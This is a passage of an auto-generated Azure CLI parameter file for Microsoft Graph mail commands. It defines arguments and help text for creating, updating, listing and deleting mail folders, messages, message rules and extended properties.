c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user-mail-folder create-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-mail-folder create-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The display name of the rule.')
c.argument('has_error', arg_type=get_three_state_flag(), help='Indicates whether the rule is in an error '
'condition. Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='Indicates whether the rule is enabled to be '
'applied to messages.')
c.argument('is_read_only', arg_type=get_three_state_flag(), help='Indicates if the rule is read-only and '
'cannot be modified or deleted by the rules REST API.')
c.argument('sequence', type=int, help='Indicates the order in which the rule is executed, among other rules.')
c.argument('body_contains', nargs='+', help='Represents the strings that should appear in the body of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('body_or_subject_contains', nargs='+', help='Represents the strings that should appear in the body '
'or subject of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('categories', nargs='+', help='Represents the categories that an incoming message should be labeled '
'with in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('from_addresses', type=validate_file_or_dict, help='Represents the specific sender email addresses '
'of an incoming message in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Exceptions')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must have attachments in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('header_contains', nargs='+', help='Represents the strings that appear in the headers of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Exceptions')
c.argument('exceptions_is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an approval request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an auto reply in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be encrypted in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting response in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be permission controlled (RMS-protected) in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('exceptions_is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a read receipt in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be S/MIME-signed in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a voice mail in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('message_action_flag', arg_type=get_enum_type(['any', 'call', 'doNotForward', 'followUp', 'fyi',
'forward', 'noResponseNecessary', 'read', 'reply',
'replyToAll', 'review']), help='',
arg_group='Exceptions')
c.argument('not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must not be a recipient of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('recipient_contains', nargs='+', help='Represents the strings that appear in either the '
'toRecipients or ccRecipients properties of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sender_contains', nargs='+', help='Represents the strings that appear in the from property of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private', 'confidential']), help='',
arg_group='Exceptions')
c.argument('sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be the only recipient in an incoming message in order for the condition or exception '
'to apply.', arg_group='Exceptions')
c.argument('sent_to_addresses', type=validate_file_or_dict, help='Represents the email addresses that an '
'incoming message must have been sent to in order for the condition or exception to apply. Expected '
'value: json-string/@json-file.', arg_group='Exceptions')
c.argument('sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in either a toRecipients or ccRecipients property of an incoming message in order '
'for the condition or exception to apply.', arg_group='Exceptions')
c.argument('subject_contains', nargs='+', help='Represents the strings that appear in the subject of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('within_size_range', action=AddWithinSizeRange, nargs='+', help='sizeRange',
arg_group='Exceptions')
c.argument('microsoft_graph_message_rule_predicates_body_contains', nargs='+', help='Represents the strings '
'that should appear in the body of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_body_or_subject_contains_body_or_subject_contains',
nargs='+', help='Represents the strings that should appear in the body or subject of an incoming '
'message in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_categories', nargs='+', help='Represents the categories '
'that an incoming message should be labeled with in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_from_addresses', type=validate_file_or_dict,
help='Represents the specific sender email addresses of an incoming message in order for the '
'condition or exception to apply. Expected value: json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must have attachments in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_header_contains', nargs='+', help='Represents the strings '
'that appear in the headers of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='',
arg_group='Conditions')
c.argument('is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an approval request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an auto reply in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be encrypted in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting response in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be permission controlled (RMS-protected) in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a read receipt in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must be '
'S/MIME-signed in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be a voice mail in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_action_flag_message_action_flag', arg_type=get_enum_type(['any', 'call',
'doNotForward',
'followUp',
'fyi', 'forward',
'noResponseNecessary',
'read', 'reply',
'replyToAll',
'review']),
help='', arg_group='Conditions')
c.argument('boolean_not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must not be a recipient of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_recipient_contains', nargs='+', help='Represents the '
'strings that appear in either the toRecipients or ccRecipients properties of an incoming message '
'in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sender_contains', nargs='+', help='Represents the strings '
'that appear in the from property of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private',
'confidential']), help='',
arg_group='Conditions')
c.argument('boolean_sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be the only recipient in an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sent_to_addresses_sent_to_addresses',
type=validate_file_or_dict, help='Represents the email addresses that an incoming message must have '
'been sent to in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be in either a toRecipients or ccRecipients property of an incoming message in '
'order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_subject_contains', nargs='+', help='Represents the strings '
'that appear in the subject of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_size_range_within_size_range', action=AddWithinSizeRange, nargs='+',
help='sizeRange', arg_group='Conditions')
c.argument('assign_categories', nargs='+', help='A list of categories to be assigned to a message.',
arg_group='Actions')
c.argument('copy_to_folder', type=str, help='The ID of a folder that a message is to be copied to.',
arg_group='Actions')
c.argument('delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be moved to the '
'Deleted Items folder.', arg_group='Actions')
c.argument('forward_as_attachment_to', type=validate_file_or_dict, help='The email addresses of the recipients '
'to which a message should be forwarded as an attachment. Expected value: json-string/@json-file.',
arg_group='Actions')
c.argument('forward_to', type=validate_file_or_dict, help='The email addresses of the recipients to which a '
'message should be forwarded. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('mark_as_read', arg_type=get_three_state_flag(), help='Indicates whether a message should be marked '
'as read.', arg_group='Actions')
c.argument('mark_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Actions')
c.argument('move_to_folder', type=str, help='The ID of the folder that a message will be moved to.',
arg_group='Actions')
c.argument('permanent_delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be '
'permanently deleted and not saved to the Deleted Items folder.', arg_group='Actions')
c.argument('redirect_to', type=validate_file_or_dict, help='The email addresses to which a message should be '
'redirected. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('stop_processing_rules', arg_type=get_three_state_flag(), help='Indicates whether subsequent rules '
'should be evaluated.', arg_group='Actions')
with self.argument_context('mail user-mail-folder create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder delete-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder list-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder update-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user-mail-folder update-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-mail-folder update-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The display name of the rule.')
c.argument('has_error', arg_type=get_three_state_flag(), help='Indicates whether the rule is in an error '
'condition. Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='Indicates whether the rule is enabled to be '
'applied to messages.')
c.argument('is_read_only', arg_type=get_three_state_flag(), help='Indicates if the rule is read-only and '
'cannot be modified or deleted by the rules REST API.')
c.argument('sequence', type=int, help='Indicates the order in which the rule is executed, among other rules.')
c.argument('body_contains', nargs='+', help='Represents the strings that should appear in the body of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('body_or_subject_contains', nargs='+', help='Represents the strings that should appear in the body '
'or subject of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('categories', nargs='+', help='Represents the categories that an incoming message should be labeled '
'with in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('from_addresses', type=validate_file_or_dict, help='Represents the specific sender email addresses '
'of an incoming message in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Exceptions')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must have attachments in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('header_contains', nargs='+', help='Represents the strings that appear in the headers of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
